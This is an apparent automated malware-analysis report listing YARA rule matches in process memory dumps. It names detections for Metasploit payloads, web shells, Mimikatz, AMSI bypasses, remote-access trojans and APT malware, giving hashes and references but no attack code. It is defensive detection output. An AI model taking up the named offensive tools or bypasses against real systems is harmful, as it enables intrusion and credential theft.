Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_Obfuscated_Mal_Feb18_1 date = 2018-02-12, hash3 = e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74, hash2 = c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036, hash1 = 06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab, author = Florian Roth, description = Detects malicious obfuscated VBS observed in February 2018, reference = https://goo.gl/zPsn83, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_ScanCopyPDF_Feb18 date = 2018-02-14, hash1 = 6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be, author = Florian Roth, description = Auto-generated rule - file Scan Copy.pdf.com, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_msfconsole date = 2017-12-24, hash1 = 662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Armitage_OSX date = 2017-12-24, hash2 = b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3, hash1 = 2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af, author = Florian Roth, description = Detects Armitage component, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Silence_malware_2 date = 2017-11-01, hash1 = 75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27, author = Florian Roth, description = Detects malware sample mentioned in the Silence report on Securelist, reference = https://securelist.com/the-silence/83009/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_PSImage date = 2017-12-16, author = Florian Roth, description = Detects a command to execute PowerShell from String, reference = https://github.com/peewpw/Invoke-PSImage, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_apt15_royaldll sha256 = bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d, author = David Cannings, description = DLL implant, originally rights.dll and runs as a service
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.536292107.0000000002E75000.00000004.00000040.sdmp, type: MEMORY	Matched rule: scanarator author = yarGen Yara Rule Generator by Florian Roth, description = Auto-generated rule on file scanarator.exe, hash = 848bd5a518e0b6c05bd29aceb8536c46
Source: 0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire_Invoke_Shellcode date = 2015-08-06, author = Florian Roth, description = Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1, reference = https://github.com/PowerShellEmpire/Empire, license = https://creativecommons.org/licenses/by-nc/4.0/, score = fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438
Source: 0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_jsp_cmdjsp date = 2014/01/28, author = Florian Roth, description = Web Shell - file cmdjsp.jsp, score = b815611cc39f17f05a73444d699341d4
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_sig_404super date = 2014/03/28, author = Florian Roth, description = Web shells - generated from file 404super.php, score = 7ed63176226f83d36dce47ce82507b28
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_webshells_new_Asp date = 2014/03/28, author = Florian Roth, description = Web shells - generated from file Asp.asp, score = 32c87744ea404d0ea0debd55915010b7
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: shankar_php_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file shankar.php.php.txt, hash = 6eb9db6a3974e511b7951b8f7e7136bb
Source: 00000013.00000003.470556930.0000000006B92000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, hash = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat date = 2014/01/28, hash4 = 3f71175985848ee46cc13282fbed2269, hash3 = 4108f28a9792b50d95f95b9e5314fa1e, hash2 = 1d912c55b96e2efe8ca873d6040e3b30, hash1 = 513b7be8bd0595c377283a7c87b44b2e, author = Florian Roth, description = Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, score = ae025c886fbe7f9ed159f49593674832
Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit date = 2014/01/28, author = Florian Roth, description = Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, score = c6eeacbe779518ea78b8f7ed5f63fc11
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_webshells_new_PHP1 date = 2014/03/28, author = Florian Roth, description = Web shells - generated from file PHP1.php, score = 14c7281fdaf2ae004ca5fec8753ce3cb
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: h4ntu_shell__powered_by_tsoi_ description = Semi-Auto-generated - file h4ntu shell [powered by tsoi
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit author = Florian Roth, description = PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, hash = b2b797707e09c12ff5e632af84b394ad41a46fa4
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf date = 2017-02-09, hash1 = 320a01ec4e023fb5fbbaef963a2b57229e4f918847e5a49c7a3f631cb556e96c, author = Florian Roth, description = Metasploit Payloads - file msf.sh, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_2 date = 2017-02-09, hash1 = e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5, author = Florian Roth, description = Metasploit Payloads - file msf.asp, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_exe date = 2017-02-09, hash1 = 321537007ea5052a43ffa46a6976075cee6a4902af0c98b9fd711b9f572c20fd, author = Florian Roth, description = Metasploit Payloads - file msf-exe.vba, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_3 date = 2017-02-09, hash1 = 335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054, author = Florian Roth, description = Metasploit Payloads - file msf.psh, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_4 date = 2017-02-09, hash1 = 26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef, author = Florian Roth, description = Metasploit Payloads - file msf.aspx, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_exe_2 date = 2017-02-09, hash1 = 3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401, author = Florian Roth, description = Metasploit Payloads - file msf-exe.aspx, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_6 date = 2017-02-09, hash1 = 8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f, author = Florian Roth, description = Metasploit Payloads - file msf.vbs, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_7 date = 2017-02-09, hash1 = 425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f, author = Florian Roth, description = Metasploit Payloads - file msf.vba, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_8 date = 2017-02-09, hash1 = 519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f, author = Florian Roth, description = Metasploit Payloads - file msf.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_cmd date = 2017-02-09, hash1 = 9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f, author = Florian Roth, description = Metasploit Payloads - file msf-cmd.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_11 date = 2017-02-09, hash1 = d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6, author = Florian Roth, description = Metasploit Payloads - file msf.hta, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2017_8759_SOAP_Excel date = 2017-09-15, author = Florian Roth, description = Detects malicious files related to CVE-2017-8759, reference = https://twitter.com/buffaloverflow/status/908455053345869825, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_ISESteroids_Obfuscation date = 2017-06-23, author = Florian Roth, description = Detects PowerShell ISESteroids obfuscation, reference = https://twitter.com/danielhbohannon/status/877953970437844993, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Reflective_DLL_Loader_Aug17_1 date = 2017-08-20, hash1 = f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320, author = Florian Roth, description = Detects Reflective DLL Loader, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Reflective_DLL_Loader_Aug17_2 date = 2017-08-20, hash2 = b90831aaf8859e604283e5292158f08f100d4a2d4e1875ea1911750a6cb85fe0, author = Florian Roth, description = Detects Reflective DLL Loader - suspicious - Possible FP could be program crack, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = c2a7a2d0b05ad42386a2bedb780205b7c0af76fe9ee3d47bbe217562f627fcae
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Reflective_DLL_Loader_Aug17_3 date = 2017-08-20, hash1 = d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474, author = Florian Roth, description = Detects Reflective DLL Loader, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBScript_Favicon_File date = 2017-10-18, hash1 = 39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36, author = Florian Roth, description = VBScript cloaked as Favicon file used in Leviathan incident, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Backdoor_Redosdru_Jun17 date = 2017-06-04, hash1 = 4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309, author = Florian Roth, description = Detects malware Redosdru - file systemHome.exe, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HTA_with_WScript_Shell date = 2017-06-21, author = Florian Roth, description = Detects WScript Shell in HTA, reference = https://twitter.com/msftmmpc/status/877396932758560768, license = https://creativecommons.org/licenses/by-nc/4.0/, score = ca7b653cf41e980c44311b2cd701ed666f8c1dbc
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HTA_Embedded date = 2017-06-21, author = Florian Roth, description = Detects an embedded HTA file, reference = https://twitter.com/msftmmpc/status/877396932758560768, license = https://creativecommons.org/licenses/by-nc/4.0/, score = ca7b653cf41e980c44311b2cd701ed666f8c1dbc
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: StoneDrill date = 2017-03-07, hash3 = 69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db, hash2 = 62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260, author = Florian Roth, description = Detects malware from StoneDrill threat report, reference = https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: StoneDrill_VBS_1 date = 2017-03-07, hash1 = 0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587, author = Florian Roth, description = Detects malware from StoneDrill threat report, reference = https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EternalRocks_taskhost date = 2017-05-18, hash1 = cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30, author = Florian Roth, description = Detects EternalRocks Malware - file taskhost.exe, reference = https://twitter.com/stamparm/status/864865144748298242, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: BeyondExec_RemoteAccess_Tool date = 2017-03-17, hash1 = 3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c, author = Florian Roth, description = Detects BeyondExec Remote Access Tool - file rexesvr.exe, reference = https://goo.gl/BvYurS, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Disclosed_0day_POCs_injector date = 2017-07-07, hash1 = ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041, author = Florian Roth, description = Detects POC code from disclosed 0day hacktool set, reference = Disclosed 0day Repos, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OilRig_Strings_Oct17 date = 2017-10-18, author = Florian Roth, description = Detects strings from OilRig malware and malicious scripts, reference = https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_Script_Running_from_HTTP author = Florian Roth, description = Detects a suspicious , reference = https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-20
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_dropper_script_Dec17_1 date = 2018-01-01, author = Florian Roth, description = Detects a supicious VBS script that drops an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Malware_1 date = 2017-06-13, hash2 = 018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81, hash1 = ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910, author = Florian Roth, description = Detects Industroyer related malware, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Portscan_3_Output date = 2017-06-13, author = Florian Roth, description = Detects Industroyer related custom port scaner output file, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Malware_4 date = 2017-06-13, hash1 = 21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561, author = Florian Roth, description = Detects Industroyer related malware, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Malware_5 date = 2017-06-13, hash1 = 7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad, author = Florian Roth, description = Detects Industroyer related malware, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: redSails_PY date = 2017-10-02, hash2 = 5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e, hash1 = 6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661, author = Florian Roth, description = Detects Red Sails Hacktool - Python, reference = https://github.com/BeetleChunks/redsails, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Rehashed_RAT_2 date = 2017-09-08, hash1 = 49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966, author = Florian Roth, description = Detects malware from Rehashed RAT incident, reference = https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware_QA_vqgk date = 2016-08-29, author = Florian Roth, description = VT Research QA uploaded malware - file vqgk.dll, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Microcin_Sample_5 date = 2017-09-26, hash1 = b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e, author = Florian Roth, description = Malware sample mentioned in Microcin technical report by Kaspersky, reference = https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = https://creativecommons.org/licenses/by-nc/4.0/, score = file
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: JS_Suspicious_Obfuscation_Dropbox date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://twitter.com/ItsReallyNick/status/887705105239343104, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: JS_Suspicious_MSHTA_Bypass date = 2017-07-19, author = Florian Roth, description = Detects MSHTA Bypass, reference = https://twitter.com/ItsReallyNick/status/887705105239343104, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: JavaScript_Run_Suspicious author = Florian Roth, description = Detects a suspicious Javascript Run command, reference = https://twitter.com/craiu/status/900314063560998912, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-23
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
